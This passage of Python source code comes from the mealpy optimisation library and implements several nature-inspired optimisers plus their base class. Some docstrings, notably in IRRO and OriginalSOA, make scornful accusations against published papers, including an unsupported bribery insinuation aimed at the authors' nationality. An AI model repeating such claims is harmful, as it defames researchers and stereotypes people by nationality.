if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < self.prob_stop: # If probability stop fly occur, then stop it, or else move on
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_percept, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < self.prob_stop:
break
step += 1
pop[i] = [pos_new, fit_new]
g_best = self.update_global_best_solution(pop_local, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class IRRO(Root):
"""
The original version of: Improved Raven Roosting Optimization (IRRO)
Link:
https://doi.org/10.1016/j.swevo.2017.11.006
Questions:
0. HOW? REALLY? How can this paper is accepted at the most strictly journal like this. I DON'T GET IT?
This is not science, this is like people to say "pseudo-science or fake science".
1. Like the above code, RRO is fake algorithm, why would someone try to improve it?
2. And of course, because it is fake algorithm, so with a simple equation you can improve it.
3. What is contribution of this paper to get accepted in this journal?
4. Where is the Algorithm. 2 (OMG, the reviewers don't they see that missing?)
Conclusion:
How much money you have to pay to get accepted in this journal? Iran author?
Please send me your code, if I'm wrong, I will publicly apology.
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
r_perception=3.6, r_leader=3.6, n_steps=20, weak_percent=0.4, food_max=1, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.r_perception = r_perception # Default: [1.8, 3.6], Factor that control the radius of perception
self.r_leader = r_leader # Default: [1.8, 3.6], Factor that control the radius of leader
self.n_steps = n_steps # Default: [5, 10, 20], Number of moving steps of each raven towards the best solution
self.weak_percent = weak_percent # Default: [0,2, 0.4, 0.6] Percentage of population will be moved towards by global best solution
self.food_max = food_max
def train(self):
r_percept = ((self.ub - self.lb) / 2) / (self.r_perception * power(self.pop_size, 1.0 / self.problem_size))
r_leader = ((self.ub - self.lb) / 2) / (self.r_leader * power(self.pop_size, 1.0 / self.problem_size))
n_ravens = self.pop_size - int(self.weak_percent * self.pop_size) # Number of greedy ravens
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
pop_local = deepcopy(pop)
for epoch in range(self.epoch):
# Calculate the food <-- The probability stopping of the fly
food_st = self.food_max * (self.epoch - epoch) / (self.epoch)
for i in range(self.pop_size):
if i < n_ravens: # Fly to global best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_leader, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < food_st:
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
d_random = uniform(zeros(self.problem_size), r_percept, self.problem_size)
pos_new = pop[i][self.ID_POS] + d_random
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
if rand() < food_st:
break
step += 1
pop[i] = [pos_new, fit_new]
pop_idx = list(range(0, self.pop_size))
pop_fit = [item[self.ID_FIT] for item in pop_local]
zipped_pop = zip(pop_fit, pop_idx)
zipped_pop = sorted(zipped_pop)
pop1, pop_local1 = deepcopy(pop), deepcopy(pop_local)
for i, (fit, idx) in enumerate(zipped_pop):
pop[i] = pop1[idx]
pop_local[i] = pop_local1[idx]
if pop_local[0][self.ID_FIT] < g_best[self.ID_FIT]:
g_best = deepcopy(pop_local[0])
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class BaseRRO(Root):
"""
My developed version: Raven Roosting Optimization (RRO)
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
n_steps=10, weak_percent=0.4, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.n_steps = n_steps # Default: [5, 10, 20], Number of moving steps of each raven towards the best solution
self.weak_percent = weak_percent # Default: [0,2, 0.4, 0.6] Percentage of population will be moved towards by global best solution
def train(self):
n_ravens = self.pop_size - int(self.weak_percent * self.pop_size) # Number of greedy ravens
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
pop_local = deepcopy(pop)
for epoch in range(self.epoch):
for i in range(self.pop_size):
if i < n_ravens: # Fly to global best
step = 0
while step < self.n_steps:
pos_new = g_best[self.ID_POS] + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
break
step += 1
pop[i] = [pos_new, fit_new]
else: # Fly to personal best
step = 0
while step < self.n_steps:
pos_new = pop_local[i][self.ID_POS] + uniform() * (pop_local[i][self.ID_POS] - pop[i][self.ID_POS])
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
if fit_new < pop_local[i][self.ID_FIT]:
pop_local[i] = [pos_new, fit_new]
break
step += 1
pop[i] = [pos_new, fit_new]
pop_idx = list(range(0, self.pop_size))
pop_fit = [item[self.ID_FIT] for item in pop_local]
zipped_pop = zip(pop_fit, pop_idx)
zipped_pop = sorted(zipped_pop)
pop1, pop_local1 = deepcopy(pop), deepcopy(pop_local)
for i, (fit, idx) in enumerate(zipped_pop):
pop[i] = pop1[idx]
pop_local[i] = pop_local1[idx]
if pop_local[0][self.ID_FIT] < g_best[self.ID_FIT]:
g_best = deepcopy(pop_local[0])
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
```
#### File: mealpy/dummy/SOA.py
```python
from numpy import pi, exp, cos, sin
from numpy.random import uniform
from mealpy.optimizer import Root
class BaseSOA(Root):
"""
My modified version of: Sandpiper Optimization Algorithm (SOA)
Notes:
+ I changed some equations and the flow of algorithm
+ Remember this paper and algorithm is dummy
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
C_f = 1.0
# Epoch loop
for epoch in range(self.epoch):
## Each individual loop
for i in range(self.pop_size):
### Based on Eq.5, 6, 7, 8, 9
C_sp = (C_f - epoch * (C_f/self.epoch)) * pop[i][self.ID_POS]
M_sp = uniform() * ( g_best[self.ID_POS] - pop[i][self.ID_POS] )
D_sp = C_sp + M_sp
### Based on Eq. 10, 11, 12, 13, 14
r = exp(uniform(0, 2*pi))
temp = r * (sin(uniform(0, 2*pi)) + cos(uniform(0, 2*pi)) + uniform(0, 2*pi))
P_sp = (D_sp * temp) * g_best[self.ID_POS]
P_sp = self.amend_position_faster(P_sp)
fit = self.get_fitness_position(P_sp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [P_sp, fit]
if fit < g_best[self.ID_FIT]:
g_best = [P_sp, fit]
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OriginalSOA(BaseSOA):
"""
The original version of: Sandpiper Optimization Algorithm (SOA)
(Sandpiper optimization algorithm: a novel approach for solving real-life engineering problems or
A bio-inspired based optimization algorithm for industrial engineering problems.)
Notes:
+ This algorithm is trash, unethical when summit a paper to 2 journals.
+ Can't even update its position.
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, **kwargs):
BaseSOA.__init__(self, obj_func, lb, ub, verbose, epoch, pop_size, kwargs=kwargs)
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
C_f = 2
# Epoch loop
for epoch in range(self.epoch):
## Each individual loop
for i in range(self.pop_size):
### Based on Eq.5, 6, 7, 8, 9
C_sp = (C_f - epoch * (C_f / self.epoch)) * pop[i][self.ID_POS]
M_sp = 0.5 * uniform() * ( g_best[self.ID_POS] - pop[i][self.ID_POS] )
D_sp = C_sp + M_sp
### Based on Eq. 10, 11, 12, 13, 14
r = exp(uniform(0, 2*pi))
temp = r * (sin(uniform(0, 2*pi)) + cos(uniform(0, 2*pi)) + uniform(0, 2*pi))
P_sp = (D_sp * temp) * g_best[self.ID_POS]
fit = self.get_fitness_position(P_sp)
pop[i] = [P_sp, fit]
if fit < g_best[self.ID_FIT]:
g_best = [P_sp, fit]
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print("Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
```
#### File: mealpy/human_based/BSO.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class ImprovedBSO(Optimizer):
"""
My improved version of: Brain Storm Optimization (BSO)
(Brain storm optimization algorithm)
Notes:
+ No need some parameters, and some useless equations
+ Using levy-flight for more robust
"""
def __init__(self, problem, epoch=10000, pop_size=100,
m_clusters=5, p1=0.25, p2=0.5, p3=0.75, p4=0.5, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
m_clusters (): number of clusters (m in the paper)
p1 (): 25% percent
p2 (): 50% percent changed by its own (local search), 50% percent changed by outside (global search)
p3 (): 75% percent develop the old idea, 25% invented new idea based on levy-flight
p4 (): Need more weights on the centers instead of the random position
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.m_clusters = m_clusters
self.p1 = p1
self.p2 = p2
self.p3 = p3
self.p4 = p4
self.m_solution = int(self.pop_size / self.m_clusters)
self.pop_group, self.centers = None, None
def _find_cluster(self, pop_group):
centers = []
for i in range(0, self.m_clusters):
_, local_best = self.get_global_best_solution(pop_group[i])
centers.append(deepcopy(local_best))
return centers
def _make_group(self, pop):
pop_group = []
for idx in range(0, self.m_clusters):
pop_group.append(deepcopy(pop[idx * self.m_solution:(idx + 1) * self.m_solution]))
return pop_group
def initialization(self):
self.pop = self.create_population(self.pop_size)
self.pop_group = self._make_group(self.pop)
self.centers = self._find_cluster(self.pop_group)
_, self.g_best = self.get_global_best_solution(self.pop)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
epxilon = 1 - 1 * (epoch + 1) / self.epoch # 1. Changed here, no need: k
if np.random.uniform() < self.p1: # p_5a
idx = np.random.randint(0, self.m_clusters)
solution_new = self.create_solution()
self.centers[idx] = solution_new
pop_group = deepcopy(self.pop_group)
for i in range(0, self.pop_size): # Generate new individuals
cluster_id = int(i / self.m_solution)
location_id = int(i % self.m_solution)
if np.random.uniform() < self.p2: # p_6b
if np.random.uniform() < self.p3:
pos_new = self.centers[cluster_id][self.ID_POS] + epxilon * np.random.uniform()
else: # 2. Using levy flight here
levy_step = self.get_levy_flight_step(beta=1.0, multiplier=0.001, case=-1)
pos_new = self.pop_group[cluster_id][location_id][self.ID_POS] + np.random.normal(0, 1, self.problem.n_dims) * levy_step
else:
id1, id2 = np.random.choice(range(0, self.m_clusters), 2, replace=False)
if np.random.uniform() < self.p4:
pos_new = 0.5 * (self.centers[id1][self.ID_POS] + self.centers[id2][self.ID_POS]) + epxilon * np.random.uniform()
else:
rand_id1 = np.random.randint(0, self.m_solution)
rand_id2 = np.random.randint(0, self.m_solution)
pos_new = 0.5 * (self.pop_group[id1][rand_id1][self.ID_POS] + self.pop_group[id2][rand_id2][self.ID_POS]) + \
epxilon * np.random.uniform()
pos_new = self.amend_position_random(pos_new)
pop_group[cluster_id][location_id] = [pos_new, None]
pop_group = [self.update_fitness_population(group) for group in pop_group]
for idx in range(0, self.m_clusters):
self.pop_group[idx] = self.greedy_selection_population(self.pop_group[idx], pop_group[idx])
# Needed to update the centers and population
self.centers = self._find_cluster(self.pop_group)
self.pop = []
for idx in range(0, self.m_clusters):
self.pop += self.pop_group[idx]
class BaseBSO(ImprovedBSO):
"""
The original version of: Brain Storm Optimization (BSO)
(Brain storm optimization algorithm)
Link:
DOI: https://doi.org/10.1007/978-3-642-21515-5_36
"""
def __init__(self, problem, epoch=10000, pop_size=100,
m_clusters=5, p1=0.2, p2=0.8, p3=0.4, p4=0.5, slope=20, miu=0, xichma=1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
m_clusters (int): number of clusters (m in the paper)
p1 (float): probability
p2 (float): probability
p3 (float): probability
p4 (float): probability
slope (int): changing logsig() function's slope (k: in the paper)
miu (float):
xichma (float):
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, m_clusters, p1, p2, p3, p4, **kwargs)
self.slope = slope
self.miu = miu
self.xichma = xichma
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
x = (0.5 * self.epoch - (epoch + 1)) / self.slope
epxilon = np.random.uniform() * (1 / (1 + np.exp(-x)))
if np.random.rand() < self.p1: # p_5a
idx = np.random.randint(0, self.m_clusters)
solution_new = self.create_solution()
self.centers[idx] = solution_new
pop_group = deepcopy(self.pop_group)
for i in range(0, self.pop_size): # Generate new individuals
cluster_id = int(i / self.m_solution)
location_id = int(i % self.m_solution)
if np.random.uniform() < self.p2: # p_6b
if np.random.uniform() < self.p3: # p_6i
cluster_id = np.random.randint(0, self.m_clusters)
if np.random.uniform() < self.p3:
pos_new = self.centers[cluster_id][self.ID_POS] + epxilon * np.random.normal(self.miu, self.xichma)
else:
rand_idx = np.random.randint(0, self.m_solution)
pos_new = self.pop_group[cluster_id][rand_idx][self.ID_POS] + np.random.uniform()
else:
id1, id2 = np.random.choice(range(0, self.m_clusters), 2, replace=False)
if np.random.uniform() < self.p4:
pos_new = 0.5 * (self.centers[id1][self.ID_POS] + self.centers[id2][self.ID_POS]) + \
epxilon * np.random.normal(self.miu, self.xichma)
else:
rand_id1 = np.random.randint(0, self.m_solution)
rand_id2 = np.random.randint(0, self.m_solution)
pos_new = 0.5 * (self.pop_group[id1][rand_id1][self.ID_POS] + self.pop_group[id2][rand_id2][self.ID_POS]) + \
epxilon * np.random.normal(self.miu, self.xichma)
pos_new = self.amend_position_random(pos_new)
pop_group[cluster_id][location_id] = [pos_new, None]
pop_group = [self.update_fitness_population(group) for group in pop_group]
for idx in range(0, self.m_clusters):
self.pop_group[idx] = self.greedy_selection_population(self.pop_group[idx], pop_group[idx])
# Needed to update the centers and population
self.centers = self._find_cluster(self.pop_group)
self.pop = []
for idx in range(0, self.m_clusters):
self.pop += self.pop_group[idx]
```
#### File: mealpy/human_based/LCO.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class OriginalLCO(Optimizer):
"""
The original version of: Life Choice-based Optimization (LCO)
(A novel life choice-based optimizer)
Link:
DOI: https://doi.org/10.1007/s00500-019-04443-z
"""
def __init__(self, problem, epoch=10000, pop_size=100, r1=2.35, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r1 (float): coefficient factor
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.r1 = r1
self.n_agents = int(np.ceil(np.sqrt(self.pop_size)))
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for i in range(0, self.pop_size):
rand_number = np.random.random()
if rand_number > 0.875: # Update using Eq. 1, update from n best position
temp = np.array([np.random.random() * self.pop[j][self.ID_POS] for j in range(0, self.n_agents)])
temp = np.mean(temp, axis=0)
elif rand_number < 0.7: # Update using Eq. 2-6
f1 = 1 - epoch / self.epoch
f2 = 1 - f1
if i == 0:
pop_new.append(deepcopy(self.g_best))
continue
else:
best_diff = f1 * self.r1 * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
better_diff = f2 * self.r1 * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
temp = self.pop[i][self.ID_POS] + np.random.random() * better_diff + np.random.random() * best_diff
else:
temp = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.random()
pos_new = self.amend_position_faster(temp)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class BaseLCO(OriginalLCO):
"""
My base version of: Life Choice-based Optimization (LCO)
(A novel life choice-based optimizer)
Link:
DOI: https://doi.org/10.1007/s00500-019-04443-z
"""
def __init__(self, problem, epoch=10000, pop_size=100, r1=2.35, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r1 (float): coefficient factor
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, r1, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# epoch: current chance, self.epoch: number of chances
pop_new = []
for i in range(0, self.pop_size):
rand = np.random.random()
if rand > 0.875: # Update using Eq. 1, update from n best position
temp = np.array([np.random.random() * self.pop[j][self.ID_POS] for j in range(0, self.n_agents)])
temp = np.mean(temp, axis=0)
elif rand < 0.7: # Update using Eq. 2-6
f = (epoch + 1) / self.epoch
if i != 0:
better_diff = f * self.r1 * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
else:
better_diff = f * self.r1 * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
best_diff = (1 - f) * self.r1 * (self.pop[0][self.ID_POS] - self.pop[i][self.ID_POS])
temp = self.pop[i][self.ID_POS] + np.random.uniform() * better_diff + np.random.uniform() * best_diff
else:
temp = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.uniform(self.problem.lb, self.problem.ub)
pos_new = self.amend_position_faster(temp)
pop_new.append([pos_new, None])
self.pop = self.update_fitness_population(pop_new)
class ImprovedLCO(Optimizer):
"""
The improved version of: Life Choice-Based Optimization (LCO) based on
+ Gaussian distribution
+ Mutation Mechanism
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = 2 * pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.pop_len = int(self.pop_size / 2)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# epoch: current chance, self.epoch: number of chances
pop_new = []
for i in range(0, self.pop_size):
rand = np.random.random()
if rand > 0.875: # Update using Eq. 1, update from n best position
n = int(np.ceil(np.sqrt(self.pop_size)))
pos_new = np.array([np.random.uniform() * self.pop[j][self.ID_POS] for j in range(0, n)])
pos_new = np.mean(pos_new, axis=0)
elif rand < 0.7: # Update using Eq. 2-6
f = (epoch + 1) / self.epoch
if i != 0:
better_diff = f * np.random.uniform() * (self.pop[i - 1][self.ID_POS] - self.pop[i][self.ID_POS])
else:
better_diff = f * np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[i][self.ID_POS])
best_diff = (1 - f) * np.random.uniform() * (self.pop[0][self.ID_POS] - self.pop[i][self.ID_POS])
pos_new = self.pop[i][self.ID_POS] + better_diff + best_diff
else:
pos_new = self.problem.ub - (self.pop[i][self.ID_POS] - self.problem.lb) * np.random.uniform(self.problem.lb, self.problem.ub)
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
## Sort the updated population based on fitness
pop, local_best = self.get_global_best_solution(pop_new)
pop_s1, pop_s2 = pop[:self.pop_len], pop[self.pop_len:]
## Mutation scheme
for i in range(0, self.pop_len):
pos_new = pop_s1[i][self.ID_POS] * (1 + np.random.normal(0, 1, self.problem.n_dims))
pop_s1[i][self.ID_POS] = self.amend_position_faster(pos_new)
pop_s1 = self.update_fitness_population(pop_s1)
## Search Mechanism
pos_s1_list = [item[self.ID_POS] for item in pop_s1]
pos_s1_mean = np.mean(pos_s1_list, axis=0)
for i in range(0, self.pop_len):
pos_new = (local_best[self.ID_POS] - pos_s1_mean) - np.random.random() * \
(self.problem.lb + np.random.random() * (self.problem.ub - self.problem.lb))
pop_s2[i][self.ID_POS] = pos_new
pop_s2 = self.update_fitness_population(pop_s2)
## Construct a new population
self.pop = pop_s1 + pop_s2
```
#### File: mealpy/music_based/HS.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseHS(Optimizer):
"""
My version of: Harmony Search (HS)
Noted:
- Using global best in the harmony memories
- Remove third for loop
"""
def __init__(self, problem, epoch=10000, pop_size=100, n_new=50, c_r=0.95, pa_r=0.05, **kwargs):
"""
Args:
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
n_new (int): Number of New Harmonies, default = 0.85
c_r (float): Harmony Memory Consideration Rate, default = 0.15
pa_r (float): Pitch Adjustment Rate, default=0.5
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.n_new = n_new
self.c_r = c_r
self.pa_r = pa_r
self.fw = 0.0001 * (self.problem.ub - self.problem.lb) # Fret Width (Bandwidth)
self.fw_damp = 0.9995 # Fret Width Damp Ratio
self.dyn_fw = self.fw
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
# Create New Harmony Position
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
delta = self.dyn_fw * np.random.normal(self.problem.lb, self.problem.ub)
# Use Harmony Memory
pos_new = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.c_r, self.g_best[self.ID_POS], pos_new)
# Pitch Adjustment
x_new = pos_new + delta
pos_new = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.pa_r, x_new, pos_new)
pos_new = self.amend_position_faster(pos_new) # Check the bound
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
# Update Damp Fret Width
self.dyn_fw = self.dyn_fw * self.fw_damp
# Merge Harmony Memory and New Harmonies, Then sort them, Then truncate extra harmonies
self.pop = self.get_sorted_strim_population(self.pop + pop_new, self.pop_size)
class OriginalHS(BaseHS):
"""
Original version of: Harmony Search (HS)
A New Heuristic Optimization Algorithm: Harmony Search
Link:
"""
def __init__(self, problem, epoch=10000, pop_size=100, n_new=50, c_r=0.95, pa_r=0.05, **kwargs):
"""
Args:
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
n_new (int): Number of New Harmonies, default = 0.85
c_r (float): Harmony Memory Consideration Rate), default = 0.15
pa_r (float): Pitch Adjustment Rate, default=0.5
"""
super().__init__(problem, epoch, pop_size, n_new, c_r, pa_r, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
for j in range(self.problem.n_dims):
# Use Harmony Memory
if np.random.uniform() <= self.c_r:
random_index = np.random.randint(0, self.pop_size)
pos_new[j] = self.pop[random_index][self.ID_POS][j]
# Pitch Adjustment
if np.random.uniform() <= self.pa_r:
delta = self.dyn_fw * np.random.normal(self.problem.lb, self.problem.ub) # Gaussian(Normal)
pos_new[j] = pos_new[j] + delta[j]
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
# Update Damp Fret Width
self.dyn_fw = self.dyn_fw * self.fw_damp
# Merge Harmony Memory and New Harmonies, Then sort them, Then truncate extra harmonies
self.pop = self.get_sorted_strim_population(self.pop + pop_new, self.pop_size)
```
#### File: mealpy/mealpy/optimizer.py
```python
import numpy as np
from math import gamma
from copy import deepcopy
from mealpy.utils.history import History
from mealpy.problem import Problem
from mealpy.utils.termination import Termination
import concurrent.futures as parallel
import time
class Optimizer:
""" This is base class of all Algorithms """
## Assumption the A solution with format: [position, [target, [obj1, obj2, ...]]]
ID_POS = 0 # Index of position/location of solution/agent
ID_FIT = 1 # Index of fitness value of solution/agent
ID_TAR = 0 # Index of target (the final fitness) in fitness
ID_OBJ = 1 # Index of objective list in fitness
EPSILON = 10E-10
def __init__(self, problem, kwargs):
"""
Args:
problem: Design your problem based on the format of the Problem class
Examples:
problem = {
"obj_func": your objective function,
"lb": list of value
"ub": list of value
"minmax": "min" or "max"
"verbose": True or False
"n_dims": int (Optional)
"batch_idea": True or False (Optional)
"batch_size": int (Optional, smaller than population size)
"obj_weight": list weights for all your objectives (Optional, default = [1, 1, ...1])
}
"""
super(Optimizer, self).__init__()
self.epoch, self.pop_size, self.solution = None, None, None
self.mode = "sequential"
self.pop, self.g_best = None, None
self.history = History()
if not isinstance(problem, Problem):
problem = Problem(problem)
self.problem = problem
self.verbose = problem.verbose
self.termination_flag = False # Check if exist object or not
if "termination" in kwargs:
termination = kwargs["termination"]
if not isinstance(termination, Termination):
print("Please create and input your Termination object!")
exit(0)
else:
self.termination = termination
self.termination_flag = True
self.nfe_per_epoch = self.pop_size
self.sort_flag = False
def termination_start(self):
if self.termination_flag:
if self.termination.mode == 'TB':
self.count_terminate = time.time()
elif self.termination.mode == 'ES':
self.count_terminate = 0
elif self.termination.mode == 'MG':
self.count_terminate = self.epoch
else: # number of function evaluation (NFE)
self.count_terminate = self.pop_size # First out of loop
else:
pass
def initialization(self):
self.pop = self.create_population(self.pop_size)
if self.sort_flag:
self.pop, self.g_best = self.get_global_best_solution(self.pop) # We sort the population
else:
_, self.g_best = self.get_global_best_solution(self.pop) # We don't sort the population
def before_evolve(self, epoch):
pass
def after_evolve(self, epoch):
pass
def solve(self, mode='sequential'):
"""
Args:
mode (str): 'sequential', 'thread', 'process'
+ 'sequential': recommended for simple and small task (< 10 seconds for calculating objective)
+ 'thread': recommended for IO bound task, or small computing task (< 2 minutes for calculating objective)
+ 'process': recommended for hard and big task (> 2 minutes for calculating objective)
Returns:
[position, fitness value]
"""
self.mode = mode
self.termination_start()
self.initialization()
self.history.save_initial_best(self.g_best)
for epoch in range(0, self.epoch):
time_epoch = time.time()
## Call before evolve function
self.before_evolve(epoch)
## Evolve method will be called in child class
self.evolve(epoch)
## Call after evolve function
self.after_evolve(epoch)
# update global best position
if self.sort_flag:
self.pop, self.g_best = self.update_global_best_solution(self.pop) # We sort the population
else:
_, self.g_best = self.update_global_best_solution(self.pop) # We don't sort the population
## Additional information for the framework
time_epoch = time.time() - time_epoch
self.history.list_epoch_time.append(time_epoch)
self.history.list_population.append(deepcopy(self.pop))
self.print_epoch(epoch + 1, time_epoch)
if self.termination_flag:
if self.termination.mode == 'TB':
if time.time() - self.count_terminate >= self.termination.quantity:
self.termination.logging(self.verbose)
break
elif self.termination.mode == 'FE':
self.count_terminate += self.nfe_per_epoch
if self.count_terminate >= self.termination.quantity:
self.termination.logging(self.verbose)
break
elif self.termination.mode == 'MG':
if epoch >= self.termination.quantity:
self.termination.logging(self.verbose)
break
else: # Early Stopping
temp = self.count_terminate + self.history.get_global_repeated_times(self.ID_FIT, self.ID_TAR, self.EPSILON)
if temp >= self.termination.quantity:
self.termination.logging(self.verbose)
break
## Additional information for the framework
self.save_optimization_process()
return self.solution[self.ID_POS], self.solution[self.ID_FIT][self.ID_TAR]
def evolve(self, epoch):
pass
def create_solution(self):
"""
Returns:
The position position with 2 element: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
return [position, fitness]
def create_population(self, pop_size=None):
"""
Args:
mode (str): processing mode, it can be "sequential", "thread" or "process"
pop_size (int): number of solutions
Returns:
population: list of solutions/agents
"""
if pop_size is None:
pop_size = self.pop_size
pop = []
if self.mode == "thread":
with parallel.ThreadPoolExecutor() as executor:
list_executors = [executor.submit(self.create_solution) for _ in range(pop_size)]
# This method yield the result everytime a thread finished their job (not by order)
for f in parallel.as_completed(list_executors):
pop.append(f.result())
elif self.mode == "process":
with parallel.ProcessPoolExecutor() as executor:
list_executors = [executor.submit(self.create_solution) for _ in range(pop_size)]
# This method yield the result everytime a cpu finished their job (not by order).
for f in parallel.as_completed(list_executors):
pop.append(f.result())
else:
pop = [self.create_solution() for _ in range(0, pop_size)]
return pop
